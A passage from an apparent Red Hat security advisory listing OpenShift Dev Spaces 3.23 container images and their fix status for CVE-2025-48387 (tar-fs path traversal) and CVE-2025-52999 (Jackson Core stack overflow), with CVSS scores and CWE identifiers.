Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le	—	Workaround

Threats

Impact Important

CVE-2025-48387

A flaw was found in tar-fs. This vulnerability allows files to be written outside the intended extraction directory via specially crafted tar archives. The issue arises from insufficient path validation during tarball extraction, potentially enabling path traversal attacks that can overwrite arbitrary files on the system.

7.3 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le	—	Vendor Fix fix Workaround

Known not affected 50 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:a69c6f8b091d11c69b6864edc6973c6f5f4515eb3a1923bf51fdb971315c28b0_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:ad5f4d1b7f712416bb62785375ce15ef1a5cb3f1a77226899abc8aba32a11623_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:c9808efcb221c10d78bdf663e3b5e3d5d281bf59702be049090fc1fa0511b078_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:13f0ec3ce663f6701501e82bbb508549e149588eedb0982729a59d98c88d0ba0_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:43d9679eb3ac8d5287863137f2d698d814a2fbc2fbd6a6aacba11240cd76d40c_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:d23a4d9f0967f53d15fefda63e972e035d23aebe819dd11a6cec9beceacd8997_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/machineexec-rhel9@sha256:e32fc2e1c50fb1110a835e29e6e360b4127ed84fca98c6276b0b171ccd6cb223_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:1168d897f16b276ba5a6e6170e31fbe1499a980666aed493b2fe27036471ba55_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:15300e7d45a8e2093ef6f33303174f7361de7d9b648f8c9f2cf06f8ba3c56c76_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:6ccd50b0049e4ba0f9d4ea8779b17c6acc95395490579fbaa3b9e9084ac7d314_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/openvsx-rhel9@sha256:e762a9019e4b5afd27331ad519a5b63a2bba3c7eb522533e0932e97c2879a36e_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:5f4c5323da09593280fc61c2df7fced0f6dc9d3ca322d27069f51334c3d18dae_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:918c66e3ea09e481c38673314021ef1aa6b46afc9dcb115b9d19b6819c5db4a7_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:cc4f2ce5926da93eaf81b0935d3171d81a310ec97e3c08bbbf6599752446810d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f2bcd5123e4fad7aa4ad54f2819a1beb75d844302aa162e0335c1a0191fe5346_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:15a4a74016cdb94aece0bc651edd221b72a9202e5fd414d30ae969707cb5b4c9_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:5361443dee5415dc554d79e2fa23a6b336f1d8ea89fb20a4caa72f70574b939b_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:a152f1e75dd10ba692587a4e702d59cd1c5adcde8b97390f58742270edf85d33_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/traefik-rhel9@sha256:f17428eced9d6bec1eaaa1510b68250824d3ace2f66af7f31fbf7327ca11540c_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:42d8388fafeb7c188b03389c92561da4068f91a8cc2343f33d967939342e4f64_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:a86e59cedc67e9fcee3412afa157572a2ab815a3d9e18da03ada502f7313cc80_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b60b4b992b89b82620e5ea618350a97434b272d1f023200dcbeae642612e3569_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-base-rhel9@sha256:ee9d72769b916b350307df495022e04add1fbcd67c1e62757fd316e7f1dd60ae_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:53618eb41967e64660e87e5ad6ce8f5d9803aed9bb48da8898aaefb4d0a4632d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:65176a94e684c200beef8f25016982ab212bdcd10d31b54a831310e20c026f77_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:a4ca99dc99b864ef805f3e8d997f0567168c809433f16ec23540c0b8ead96216_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/udi-rhel9@sha256:cc31b6212f77e03383e615ee30fd97419806c3841f18d2f6c950d82cdd21e872_ppc64le	—	Workaround

Threats

Impact Important

CVE-2025-52999

A nested data handling flaw was found in Jackson Core. When parsing particularly deeply nested data structures, a StackoverflowError can occur.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-121 - Stack-based Buffer Overflow

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:27b7eef1c64e432dbe15e92cf745a951aebdc9b379d9c02dbfef6df296c39cd1_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:3cfcd5f9ab8ec42cefd8fab992ecb493a9d14126bdf53ba542ffa4b51fd1684c_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:641354f1d56627f49af3e32ad963616b69aac644ac33d664e7fe29de32fe43b3_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/server-rhel9@sha256:fa5400aecca1a46c4b98d00c749ea56d6187ced20952f02e4dd1c12e2467117e_ppc64le	—	Vendor Fix fix Workaround

Known not affected 50 products

Product	Version	Remediation
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/idea-rhel9@sha256:df24ebb239a2cc0d4543309f51a7268c7d524d428a536e0b3443c51089c3f87e_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:0dc291e3dc58d285d054a35b480d14c3912777e14fd643915b8ceabd178ad6bf_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:ac5b3e78470c747377dbc9ecb6e0680d724086c331955ed5471b74d01155ece8_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:cd1ee1d15cafe77bbf8e283cee2cde88dcdfb59c9545867a047cf4b42089aa85_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces-tech-preview/jetbrains-ide-rhel9@sha256:d0b17cb5f9a530ca959058fe926b3f5c42539487e23587d51948f49d7a38cf5d_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:2bfe5265856abdd8cb490bde852d4e992f1793684f003d1ef53776fe69d790d7_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:32d9568317c55235f75c4d0e1c98de6d4af252cbdd116ed2355025cbaeac862f_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:48b99d167a5c54a98e69bba441bb5b70db2ffe065d3f8f8d23ecfed7b813336e_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/code-rhel9@sha256:8b2b33e91756bbd1c7ed6905e00176b9d55a4e13aee2f84862bc571a8a82f113_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:43cdf063e9a6aa5f84233c8bd850a711b5d5fae8a7795803609fec07d189ca05_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:7ad9073c0a768f170cf8d4311ea35ec1caccfdefdf6d1dccbc10ed01cdeafd16_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:934c224a59086c689be1839b6846a0984370a78a8adc8510fa692f5215bb6182_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/configbump-rhel9@sha256:d2bfcb27baf36e569eca4f7c85f458a180d7938616413a4cf8e10cb329e6a150_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:78dabed4a5fc1eb3246778e6ee6e1a543829cf88d0b03f0ccccf101c41a7bdda_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:7c98501fee1297a24caa77d325f6bfd7f91192589f0aa22d47d9766e8219c749_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:905d45518e20ea10daa3a35ea2f2201a6f762a16f9b4829ce37b7396d493ac59_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/dashboard-rhel9@sha256:91e064bccc3f7320844763fc136cb4c650db40190e01edebe16135bcc00627ac_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:a48dd94d5616183843ba939146b7e4d985210cdd902038ff80ff6df3df3d74ca_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:2b18f2cf31e0914762cc6e99c9797c24a19db69ca08bc9983bc2aacc85ee7024_amd64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:38c9b56aa9c2a5153e01ffc1edb399247ed1937b9382ac4f0fb2beae4c27f69a_ppc64le	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:59f85768c28401783b9475ce21088e3d8fbf6bcd64bb49e3a243c881ac6b546c_s390x	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:f5b515ecaea7d542ac18ea5a056c99fe84ca2ac25fa3904bdc50a78ecf47541f_arm64	—	Workaround
Unresolved product id: Red Hat OpenShift Dev Spaces (RHOSDS) 3.23:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:8cdf016c4d61bce4f244415ae192fe1647ef517ba1690f2009b5b8e1104c72a7_s390x	—	Workaround
